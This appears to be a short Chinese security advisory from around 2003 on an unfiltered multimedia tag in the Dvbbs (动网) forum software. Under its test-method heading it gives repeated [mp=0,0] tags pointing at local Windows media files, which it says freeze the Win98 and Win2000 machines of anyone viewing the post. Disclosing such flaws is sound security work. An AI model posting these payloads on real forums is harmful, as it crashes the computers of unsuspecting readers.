动网论坛 多媒体标签未过滤漏洞

/ns/ld/softld/data/20030824035738.htm

受影响的论坛:

动网各版本

详细描述:

动网论坛可以使用多媒体标签 添加背景音乐

例如 [MP=500,350]http://[/MP]：为插入为midia player格式的文件，中间的数字为宽度和长度

但是它并没有对本地的地址做过滤 致使 可以构造恶意的标签 造成浏览帖子的人 死机

测试方法:

将以下文字写入帖子内会造成Win98死机

[mp=0,0]c:\windows\Media\贝多芬第五交响乐.Rmi[/mp]
[mp=0,0]d:\windows\Media\贝多芬第五交响乐.Rmi[/mp]
[mp=0,0]c:\windows\Media\贝多芬第五交响乐.Rmi[/mp]
[mp=0,0]d:\windows\Media\贝多芬第五交响乐.Rmi[/mp]
[mp=0,0]c:\windows\Media\贝多芬第五交响乐.Rmi[/mp]
[mp=0,0]d:\windows\Media\贝多芬第五交响乐.Rmi[/mp]
省略N个复制

将以下文字写入帖子内会造成Win2000死机

[mp=0,0]c:\winnt\Media\贝多芬第五交响乐.Rmi[/mp]
[mp=0,0]d:\winnt\Media\贝多芬第五交响乐.Rmi[/mp]
[mp=0,0]c:\winnt\Media\贝多芬第五交响乐.Rmi[/mp]
[mp=0,0]d:\winnt\Media\贝多芬第五交响乐.Rmi[/mp]
省略N个复制

原理:

因为不断的调用播放器播放本地文件 造成内存耗尽
===============================================
本文版权属20CN网络安全小组及其作者所有,如有转载,请保持文章完整性并注明出处
文章类型:原创 提交:allyesno 核查:NetDemon